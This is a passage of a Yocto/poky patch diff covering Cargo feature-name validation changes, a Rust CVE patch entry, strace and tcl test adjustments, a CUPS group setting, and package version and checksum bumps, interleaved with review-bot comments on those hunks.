+ // allow future cargo implementations to break the
+ // interpretation of each line here and older cargo will simply
+ // ignore the new lines.
+- let summary = match IndexSummary::parse(config, line, source_id) {
++ let summary = match IndexSummary::parse(line, source_id) {
+ Ok(summary) => summary,
+ Err(e) => {
+ // This should only happen when there is an index
+@@ -793,17 +790,12 @@ impl MaybeIndexSummary {
+ /// Does nothing if this is already `Parsed`, and otherwise the `raw_data`
+ /// passed in is sliced with the bounds in `Unparsed` and then actually
+ /// parsed.
+- fn parse(
+- &mut self,
+- config: &Config,
+- raw_data: &[u8],
+- source_id: SourceId,
+- ) -> CargoResult<&IndexSummary> {
++ fn parse(&mut self, raw_data: &[u8], source_id: SourceId,) -> CargoResult<&IndexSummary> {
+ let (start, end) = match self {
+ MaybeIndexSummary::Unparsed { start, end } => (*start, *end),
+ MaybeIndexSummary::Parsed(summary) => return Ok(summary),
+ };
+- let summary = IndexSummary::parse(config, &raw_data[start..end], source_id)?;
++ let summary = IndexSummary::parse(&raw_data[start..end], source_id)?;
+ *self = MaybeIndexSummary::Parsed(summary);
+ match self {
+ MaybeIndexSummary::Unparsed { .. } => unreachable!(),
+@@ -823,7 +815,7 @@ impl IndexSummary {
+ /// a package.
+ ///
+ /// The `line` provided is expected to be valid JSON.
+- fn parse(config: &Config, line: &[u8], source_id: SourceId) -> CargoResult<IndexSummary> {
++ fn parse(line: &[u8], source_id: SourceId) -> CargoResult<IndexSummary> {
+ // ****CAUTION**** Please be extremely careful with returning errors
+ // from this function. Entries that error are not included in the
+ // index cache, and can cause cargo to get confused when switching
+@@ -853,7 +845,7 @@ impl IndexSummary {
+ features.entry(name).or_default().extend(values);
+ }
+ }
+- let mut summary = Summary::new(config, pkgid, deps, &features, links)?;
++ let mut summary = Summary::new(pkgid, deps, &features, links)?;
+ summary.set_checksum(cksum);
+ Ok(IndexSummary {
+ summary,
+
+diff --git a/src/tools/cargo/src/cargo/util/toml/mod.rs b/src/tools/cargo/src/cargo/util/toml/mod.rs
+index 1cc32dee8..a32f0384b 100644
+--- a/src/tools/cargo/src/cargo/util/toml/mod.rs
++++ b/src/tools/cargo/src/cargo/util/toml/mod.rs
+@@ -2432,7 +2432,6 @@ impl TomlManifest {
+ let empty_features = BTreeMap::new();
+
+ let summary = Summary::new(
+- config,
+ pkgid,
+ deps,
+ me.features.as_ref().unwrap_or(&empty_features),
+diff --git a/src/tools/cargo/tests/testsuite/features.rs b/src/tools/cargo/tests/testsuite/features.rs
+index 848e05677..557fab14a 100644
+--- a/src/tools/cargo/tests/testsuite/features.rs
++++ b/src/tools/cargo/tests/testsuite/features.rs
+@@ -1937,8 +1937,8 @@ fn nonexistent_required_features() {
+ }
+
+ #[cargo_test]
+-fn invalid_feature_names_warning() {
+- // Warnings for more restricted feature syntax.
++fn invalid_feature_names_error() {
++ // Errors for more restricted feature syntax.
+ let p = project()
+ .file(
+ "Cargo.toml",
+@@ -1948,72 +1948,57 @@ fn invalid_feature_names_warning() {
+ version = "0.1.0"
+
+ [features]
+- # Some valid, but unusual names, shouldn't warn.
+- "c++17" = []
+- "128bit" = []
+- "_foo" = []
+- "feat-name" = []
+- "feat_name" = []
+- "foo.bar" = []
+-
+- # Invalid names.
++ # Invalid start character.
+ "+foo" = []
+- "-foo" = []
+- ".foo" = []
+- "foo:bar" = []
+- "foo?" = []
+- "?foo" = []
+- "ⒶⒷⒸ" = []
+- "a¼" = []
+ "#,
+ )
+ .file("src/lib.rs", "")
+ .build();
+
+- // Unfortunately the warnings are duplicated due to the Summary being
+- // loaded twice (once in the Workspace, and once in PackageRegistry) and
+- // Cargo does not have a de-duplication system. This should probably be
+- // OK, since I'm not expecting this to affect anyone.
+ p.cargo("check")
+- .with_stderr("\
+-[WARNING] invalid character `+` in feature `+foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `-` in feature `-foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `.` in feature `.foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `?` in feature `?foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `¼` in feature `a¼` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `:` in feature `foo:bar` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `?` in feature `foo?` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `Ⓐ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `Ⓑ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[WARNING] invalid character `Ⓒ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters)
+-This was previously accepted but is being phased out; it will become a hard error in a future release.
+-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project.
+-[CHECKING] foo v0.1.0 [..]
+-[FINISHED] [..]
+-")
++ .with_status(101)
++ .with_stderr(
++ "\
++error: failed to parse manifest at `[ROOT]/foo/Cargo.toml`
++
++Caused by:
++ invalid character `+` in feature `+foo` in package foo v0.1.0 ([ROOT]/foo), \
++ the first character must be a Unicode XID start character or digit \
++ (most letters or `_` or `0` to `9`)
++",
++ )
++ .run();
++
++ p.change_file(
++ "Cargo.toml",
++ r#"
++ [package]
++ name = "foo"
++ version = "0.1.0"
++
++ [features]
++ # Invalid continue character.
++ "a&b" = []
++ "#,
++ );
++
++ p.cargo("check")
++ .with_status(101)
++ .with_stderr(
++ "\
++error: failed to parse manifest at `[ROOT]/foo/Cargo.toml`
++
++Caused by:
++ invalid character `&` in feature `a&b` in package foo v0.1.0 ([ROOT]/foo), \
++ characters must be Unicode XID characters, `+`, or `.` \
++ (numbers, `+`, `-`, `_`, `.`, or most letters)
++",
++ )
+ .run();
+ }
+
+ #[cargo_test]
+-fn invalid_feature_names_error() {
++fn invalid_feature_name_slash_error() {
+ // Errors for more restricted feature syntax.
+ let p = project()
+ .file(
diff --git a/poky/meta/recipes-devtools/rust/rust-source.inc b/poky/meta/recipes-devtools/rust/rust-source.inc
index 4a720e645b..086375a3c6 100644
--- a/poky/meta/recipes-devtools/rust/rust-source.inc
+++ b/poky/meta/recipes-devtools/rust/rust-source.inc
@@ -7,6 +7,7 @@ SRC_URI += "https://static.rust-lang.org/dist/rustc-${RUST_VERSION}-src.tar.xz;n
file://zlib-off64_t.patch;patchdir=${RUSTSRC} \
file://0001-musl-Define-SOCK_SEQPACKET-in-common-place.patch;patchdir=${RUSTSRC} \
file://bootstrap_fail.patch;patchdir=${RUSTSRC} \
+ file://0002-CVE-2023-40030.patch;patchdir=${RUSTSRC} \
"
SRC_URI[rust.sha256sum] = "bb8e9c564566b2d3228d95de9063a9254182446a161353f1d843bfbaf5c34639"
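Review bot: the added `file://0002-CVE-2023-40030.patch` entry carries a security fix as a local patch while `SRC_URI[rust.sha256sum]` in the context stays unchanged, so the fix exists only for as long as this line does. The header of that patch file is not part of this hunk; check that it carries `CVE: CVE-2023-40030` and an `Upstream-Status: Backport [...]` line so CVE tracking records the issue as patched, and drop the entry once RUST_VERSION moves to a release that already contains the fix.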
diff --git a/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch b/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch
deleted file mode 100644
index 5c73e1f10e..0000000000
--- a/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-From 002d9f2512245536dfc8d62db429d97e2216ec3a Mon Sep 17 00:00:00 2001
-From: Randy MacLeod <Randy.MacLeod@windriver.com>
-Date: Fri, 6 Oct 2023 12:08:23 -0700
-Subject: [PATCH] skip tests/so_peerpidfd.gen.test
-
-Upstream-Status: Inappropriate
-
-Signed-off-by: Randy MacLeod <Randy.MacLeod@windriver.com>
----
- tests/so_peerpidfd.gen.test | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/tests/so_peerpidfd.gen.test b/tests/so_peerpidfd.gen.test
-index 64ad3a2..f89da9f 100755
---- a/tests/so_peerpidfd.gen.test
-+++ b/tests/so_peerpidfd.gen.test
-@@ -1,4 +1,5 @@
- #!/bin/sh -efu
- # Generated by ./tests/gen_tests.sh from ./tests/gen_tests.in (so_peerpidfd --trace=getsockopt -y); do not edit.
- . "${srcdir=.}/init.sh"
-+skip_ "Test fails due to apparently trivial log format differences"
- run_strace_match_diff --trace=getsockopt -y
---
-2.39.0
-
diff --git a/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch b/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch
new file mode 100644
index 0000000000..62f73d3643
--- /dev/null
+++ b/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch
@@ -0,0 +1,32 @@
+From 44cf51a38cce1e90bb6c22208fa45f95cdcc8f5d Mon Sep 17 00:00:00 2001
+From: "Dmitry V. Levin" <ldv@strace.io>
+Date: Sat, 14 Oct 2023 08:00:00 +0000
+Subject: [PATCH] tests: fix so_peerpidfd test
+
+* tests/so_peerpidfd.c (print_pidfd): Fix expected output.
+
+Fixes: v6.5~38 "net: implement decoding of SO_PEERPIDFD socket option"
+Resolves: https://bugzilla.redhat.com/show_bug.cgi?id=2243631
+
+Upstream-Status: Backport [https://github.com/strace/strace/commit/44cf51a38cce1e90bb6c22208fa45f95cdcc8f5d]
+Signed-off-by: Randy MacLeod <Randy.MacLeod@windriver.com>
+---
+ tests/so_peerpidfd.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/so_peerpidfd.c b/tests/so_peerpidfd.c
+index 33988edec..dfad1c434 100644
+--- a/tests/so_peerpidfd.c
++++ b/tests/so_peerpidfd.c
+@@ -37,7 +37,7 @@ print_pidfd(int *p)
+ if (rc < 0)
+ printf("%p", p);
+ else
+- printf("%d%s", *p, pidfd_suffix);
++ printf("[%d%s]", *p, pidfd_suffix);
+ }
+
+ static void
+--
+2.34.1
+
diff --git a/poky/meta/recipes-devtools/strace/strace_6.5.bb b/poky/meta/recipes-devtools/strace/strace_6.5.bb
index d6475e8db9..d1536b1e8d 100644
--- a/poky/meta/recipes-devtools/strace/strace_6.5.bb
+++ b/poky/meta/recipes-devtools/strace/strace_6.5.bb
@@ -14,7 +14,7 @@ SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \
file://skip-load.patch \
file://0001-configure-Use-autoconf-macro-to-detect-largefile-sup.patch \
file://0002-tests-Replace-off64_t-with-off_t.patch \
- file://skip-test-so_peerpidfd.gen.test.patch \
+ file://tests-fix-so_peerpidfd-test.patch \
"
SRC_URI[sha256sum] = "dfb051702389e1979a151892b5901afc9e93bbc1c70d84c906ade3224ca91980"
diff --git a/poky/meta/recipes-devtools/tcltk/tcl/run-ptest b/poky/meta/recipes-devtools/tcltk/tcl/run-ptest
index 5b9127784e..87e025fce1 100644
--- a/poky/meta/recipes-devtools/tcltk/tcl/run-ptest
+++ b/poky/meta/recipes-devtools/tcltk/tcl/run-ptest
@@ -3,7 +3,11 @@
# clock.test needs a timezone to be set
export TZ="Europe/London"
export TCL_LIBRARY=library
-SKIPPED_TESTS=
+
+# Some tests are overly strict with timings and fail on loaded systems.
+# See bugs #14825 #14882 #15081 #15321.
+SKIPPED_TESTS='async-* cmdMZ-6.6 event-* exit-1.* socket-* socket_inet-*'
+
for i in `ls tests/*.test | awk -F/ '{print $2}'`; do
./tcltest tests/all.tcl -file $i -skip "$SKIPPED_TESTS" >$i.log 2>&1
grep -q -F -e "Files with failing tests:" -e "Test files exiting with errors:" $i.log
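Review bot: the new `SKIPPED_TESTS` value skips whole test families (`async-*`, `event-*`, `socket-*`, `socket_inet-*`) rather than the individual timing-sensitive cases, so the ptest run no longer exercises any socket or event-loop behaviour. Narrow the patterns to the test IDs that actually failed where they are known, as is already done for `cmdMZ-6.6`, and name the tracker that `#14825 #14882 #15081 #15321` refer to in the comment so the skips can be revisited.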
diff --git a/poky/meta/recipes-extended/cups/cups.inc b/poky/meta/recipes-extended/cups/cups.inc
index fa32c38549..4c414b6549 100644
--- a/poky/meta/recipes-extended/cups/cups.inc
+++ b/poky/meta/recipes-extended/cups/cups.inc
@@ -55,7 +55,7 @@ EXTRA_OECONF = " \
--enable-debug \
--disable-relro \
--enable-libusb \
- --with-system-groups=lpadmin \
+ --with-system-groups=lpadmin,root,sys,wheel \
--with-cups-group=lp \
--with-domainsocket=/run/cups/cups.sock \
--with-pkgconfpath=${libdir}/pkgconfig \
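Review bot: `--with-system-groups=lpadmin,root,sys,wheel` widens CUPS administrative access from one dedicated group to every member of `root`, `sys` and `wheel`, and the hunk gives no reason for it. Add a comment stating why the extra groups are needed, and consider listing only the groups that are meant to administer printing on the target image, since any account placed in `wheel` for other purposes gains printer administration as a side effect.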
diff --git a/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.0.bb b/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.1.bb
index 4bad0f86e1..18c296128a 100644
--- a/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.0.bb
+++ b/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.1.bb
@@ -28,7 +28,7 @@ SRC_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/downlo
file://configure.ac-add-option-to-explicitly-disable-neon.patch \
"
-SRC_URI[sha256sum] = "e54062f166708d84ca82de9f8304a04344466080f936118b88082bd55ed6dc97"
+SRC_URI[sha256sum] = "e429e4f5b01615a4f0f93a4128e8a1a4d932dff983b1774174c79c0630717ad9"
PACKAGECONFIG ??= ""
PACKAGECONFIG[gtk] = "--enable-gtk,--disable-gtk,gtk+3"
diff --git a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb
index 7919ef9b24..8cc1f7cec3 100644
--- a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -10,9 +10,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
DEPENDS = "libtirpc"
-PV = "2.0.0"
+PV = "2.0.1"
-SRCREV = "82245c0c58add79a8e34ab0917358217a70e5100"
+SRCREV = "d4b22e54b5e6637a69b26eab5faad2a326c9b182"
SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
"
diff --git a/poky/meta/recipes-extended/libsolv/libsolv_0.7.25.bb b/poky/meta/recipes-extended/libsolv/libsolv_0.7.26.bb
index 69cb3f7996..bae7960138 100644
--- a/poky/meta/recipes-extended/libsolv/libsolv_0.7.25.bb
+++ b/poky/meta/recipes-extended/libsolv/libsolv_0.7.26.bb
@@ -12,7 +12,7 @@ SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
file://0001-utils-Conside-musl-when-wrapping-qsort_r.patch \
"
-SRCREV = "f1be8bf3dcc7dc14d331adbc97f337fa08e641c9"
+SRCREV = "48c985375134d2443eee551613161cadc278af2f"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
diff --git a/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb b/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb
index ad16554e98..00d8183a4f 100644
--- a/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -14,10 +14,9 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar
file://help2man-reproducibility.patch \
"
-SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
SRC_URI[sha256sum] = "99321288f8d62e7a1d485b7c6bdccf06766fb8ca603c6195806e4457fdf17172"
-UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/lsb/files/lsb_release/"
+UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/lsb/files/lsb_release/"
UPSTREAM_CHECK_REGEX = "/lsb_release/(?P<pver>(\d+[\.\-_]*)+)/"
CLEANBROKEN = "1"
diff --git a/poky/meta/recipes-extended/msmtp/msmtp_1.8.24.bb b/poky/meta/recipes-extended/msmtp/msmtp_1.8.25.bb
index b8c867161b..b575fad5e1 100644
--- a/poky/meta/recipes-extended/msmtp/msmtp_1.8.24.bb
+++ b/poky/meta/recipes-extended/msmtp/msmtp_1.8.25.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
UPSTREAM_CHECK_URI = "https://marlam.de/msmtp/download/"
SRC_URI = "https://marlam.de/${BPN}/releases/${BP}.tar.xz"
-SRC_URI[sha256sum] = "bd6644b1aaab17d61b86647993e3efad860b23c54283b00ddc579c1f5110aa59"
+SRC_URI[sha256sum] = "2dfe1dbbb397d26fe0b0b6b2e9cd2efdf9d72dd42d18e70d7f363ada2652d738"
inherit gettext autotools update-alternatives pkgconfig
diff --git a/poky/meta/recipes-extended/newt/libnewt_0.52.23.bb b/poky/meta/recipes-extended/newt/libnewt_0.52.24.bb
index cd3731cf74..1e39a1c5ca 100644
--- a/poky/meta/recipes-extended/newt/libnewt_0.52.23.bb
+++ b/poky/meta/recipes-extended/newt/libnewt_0.52.24.bb
@@ -23,7 +23,7 @@ SRC_URI = "https://releases.pagure.org/newt/newt-${PV}.tar.gz \
file://0001-detect-gold-as-GNU-linker-too.patch \
"
-SRC_URI[sha256sum] = "caa372907b14ececfe298f0d512a62f41d33b290610244a58aed07bbc5ada12a"
+SRC_URI[sha256sum] = "5ded7e221f85f642521c49b1826c8de19845aa372baf5d630a51774b544fbdbb"
S = "${WORKDIR}/newt-${PV}"
diff --git a/poky/meta/recipes-extended/timezone/timezone.inc b/poky/meta/recipes-extended/timezone/timezone.inc
index 14a1ce18f3..2774e5e730 100644
--- a/poky/meta/recipes-extended/timezone/timezone.inc
+++ b/poky/meta/recipes-extended/timezone/timezone.inc
@@ -6,7 +6,7 @@ SECTION = "base"
LICENSE = "PD & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
-PV = "2023c"
+PV = "2023d"
SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode;subdir=tz \
http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata;subdir=tz \
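Review bot: the `SRC_URI` context lines in this hunk still fetch tzcode and tzdata over plain `http://www.iana.org/...`, so the `sha256sum` values updated in the following hunk are the only integrity protection for these downloads. The checksums do cover the fetch, but the same update moves the lsb-release `UPSTREAM_CHECK_URI` to https; switching these URLs (and the `UPSTREAM_CHECK_URI` in the next hunk) to https alongside the `PV` bump would be consistent with that.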
@@ -16,5 +16,5 @@ S = "${WORKDIR}/tz"
UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
-SRC_URI[tzcode.sha256sum] = "46d17f2bb19ad73290f03a203006152e0fa0d7b11e5b71467c4a823811b214e7"
-SRC_URI[tzdata.sha256sum] = "3f510b5d1b4ae9bb38e485aa302a776b317fb3637bdb6404c4adf7b6cadd965c"
+SRC_URI[tzcode.sha256sum] = "e9a5f9e118886d2de92b62bb05510a28cc6c058d791c93bd6b84d3292c3c161e"
+SRC_URI[tzdata.sha256sum] = "dbca21970b0a8b8c0ceceec1d7b91fa903be0f6eca5ae732b5329672232a08f3"
diff --git a/poky/meta/recipes-gnome/gtk+/gtk+3.inc b/poky/meta/recipes-gnome/gtk+/gtk+3.inc
index 8d01e6077f..4a04c06432 100644
--- a/poky/meta/recipes-gnome/gtk+/gtk+3.inc
+++ b/poky/meta/recipes-gnome/gtk+/gtk+3.inc
@@ -41,7 +41,7 @@ PACKAGECONFIG[x11] = "-Dx11_backend=true,-Dx11_backend=false,at-spi2-atk fontcon
# this is provided by oe-core patch that removes epoxy/gl dependency from a X11 build
PACKAGECONFIG[opengl] = "-Dopengl=true,-Dopengl=false,libepoxy"
PACKAGECONFIG[wayland] = "-Dwayland_backend=true,-Dwayland_backend=false,wayland wayland-protocols libxkbcommon virtual/egl virtual/libgles2 wayland-native"
-PACKAGECONFIG[cups] = ",,cups,cups"
+PACKAGECONFIG[cups] = ",,cups,cups gtk3-printbackend-cups"
PACKAGECONFIG[colord] = "-Dcolord=yes,-Dcolord=no,colord"
PACKAGECONFIG[cloudproviders] = "-Dcloudproviders=true,-Dcloudproviders=false,libcloudproviders"
PACKAGECONFIG[tracker3] = "-Dtracker3=true,-Dtracker3=false,tracker,tracker-miners"
diff --git a/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb b/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb
index a547db8376..001b06934e 100644
--- a/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb
+++ b/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb
@@ -66,7 +66,7 @@ PACKAGECONFIG:class-nativesdk = "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)
PACKAGECONFIG[x11] = "-Dx11-backend=true,-Dx11-backend=false,at-spi2-atk fontconfig libx11 libxext libxcursor libxi libxdamage libxrandr libxrender libxcomposite libxfixes xinerama"
PACKAGECONFIG[wayland] = "-Dwayland-backend=true,-Dwayland-backend=false,wayland wayland-protocols virtual/egl virtual/libgles2 wayland-native"
PACKAGECONFIG[cloudproviders] = "-Dcloudproviders=enabled,-Dcloudproviders=disabled,libcloudproviders"
-PACKAGECONFIG[cups] = "-Dprint-cups=enabled,-Dprint-cups=disabled,cups,cups"
+PACKAGECONFIG[cups] = "-Dprint-cups=enabled,-Dprint-cups=disabled,cups,cups gtk4-printbackend-cups"
PACKAGECONFIG[colord] = "-Dcolord=enabled,-Dcolord=disabled,colord"
PACKAGECONFIG[iso-codes] = ",,iso-codes,iso-codes"
PACKAGECONFIG[ffmpeg] = "-Dmedia-ffmpeg=enabled,-Dmedia-ffmpeg=disabled,ffmpeg"
diff --git a/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.1.bb b/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.2.bb
index df41af29f9..ce1a6bed65 100644
--- a/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.1.bb
+++ b/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.2.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b98429b8e8e3c2a67cfef01e99e4893d \
"
SRC_URI = "${GITHUB_BASE_URI}/download/${PV}/${BPN}-${PV}.tar.xz"
-SRC_URI[sha256sum] = "0fec78f98c9c8faf228957a201c8846f809452c20f8445eb092a1ba6f22dbea5"
+SRC_URI[sha256sum] = "e433ad85fbdf57f680be29479b3f964577379aaf319f557eb76569f0ecbc90f3"
DEPENDS += "glib-2.0-native"
diff --git a/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.0.bb b/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.1.bb
index 146d80008c..99ed82dac4 100644
--- a/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.0.bb
+++ b/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.1.bb
@@ -10,7 +10,7 @@ DEPENDS:append:x86:class-target = " nasm-native"
SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz"
-SRC_URI[sha256sum] = "c77c65fcce3d33417b2e90432e7a0eb05f59a7fff884022a9d931775d583bfaa"
+SRC_URI[sha256sum] = "22429507714ae147b3acacd299e82099fce5d9f456882fc28e252e4579ba2a75"
UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/libjpeg-turbo/files/"
UPSTREAM_CHECK_REGEX = "/libjpeg-turbo/files/(?P<pver>(\d+[\.\-_]*)+)/"
diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.8.bb b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.9.bb
index 19db7ea434..43c06181e3 100644
--- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.8.bb
+++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.9.bb
@@ -3,7 +3,7 @@ require xserver-xorg.inc
SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
file://0001-Avoid-duplicate-definitions-of-IOPortBase.patch \
"
-SRC_URI[sha256sum] = "38aadb735650c8024ee25211c190bf8aad844c5f59632761ab1ef4c4d5aeb152"
+SRC_URI[sha256sum] = "ff697be2011b4c4966b7806929e51b7a08e9d33800d505305d26d9ccde4b533a"
# These extensions are now integrated into the server, so declare the migration
# path for in-place upgrades.
diff --git a/poky/meta/recipes-graphics/xwayland/xwayland_23.2.1.bb b/poky/meta/recipes-graphics/xwayland/xwayland_23.2.2.bb
index e97a921a96..9feac147db 100644
--- a/poky/meta/recipes-graphics/xwayland/xwayland_23.2.1.bb
+++ b/poky/meta/recipes-graphics/xwayland/xwayland_23.2.2.bb
@@ -10,7 +10,7 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=5df87950af51ac2c5822094553ea1880"
SRC_URI = "https://www.x.org/archive/individual/xserver/xwayland-${PV}.tar.xz"
-SRC_URI[sha256sum] = "eebc2692c3aa80617d78428bc6ec7b91b254a98214d2a70e997098503cd6ef90"
+SRC_URI[sha256sum] = "9f7c0938d2a41e941ffa04f99c35e5db2bcd3eec034afe8d35d5c810a22eb0a8"
UPSTREAM_CHECK_REGEX = "xwayland-(?P<pver>\d+(\.(?!90\d)\d+)+)\.tar"
diff --git a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 3fcfe4b4c3..941160ea9c 100644
--- a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "\
DEPENDS = "git-native"
-SRCREV = "6645d3897cc2eeb1237ee0e2ff5342bd73ee0875"
+SRCREV = "7160ebe8b865dd6028aef278efa219433db93f7e"
PV = "0.3+git"
inherit native
diff --git a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20230804.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20231030.bb
index 1dbe8374bc..c0394b9b3b 100644
--- a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20230804.bb
+++ b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20231030.bb
@@ -12,6 +12,7 @@ LICENSE = "\
& Firmware-amdgpu \
& Firmware-amd-ucode \
& Firmware-amlogic_vdec \
+ & Firmware-amphion_vpu \
& Firmware-atheros_firmware \
& Firmware-atmel \
& Firmware-broadcom_bcm43xx \
@@ -32,6 +33,7 @@ LICENSE = "\
& Firmware-i915 \
& Firmware-ibt_firmware \
& Firmware-ice \
+ & Firmware-ice_enhanced \
& Firmware-it913x \
& Firmware-iwlwifi_firmware \
& Firmware-IntcSST2 \
@@ -39,11 +41,14 @@ LICENSE = "\
& Firmware-linaro \
& Firmware-Lontium \
& Firmware-Marvell \
+ & Firmware-mediatek \
+ & Firmware-microchip \
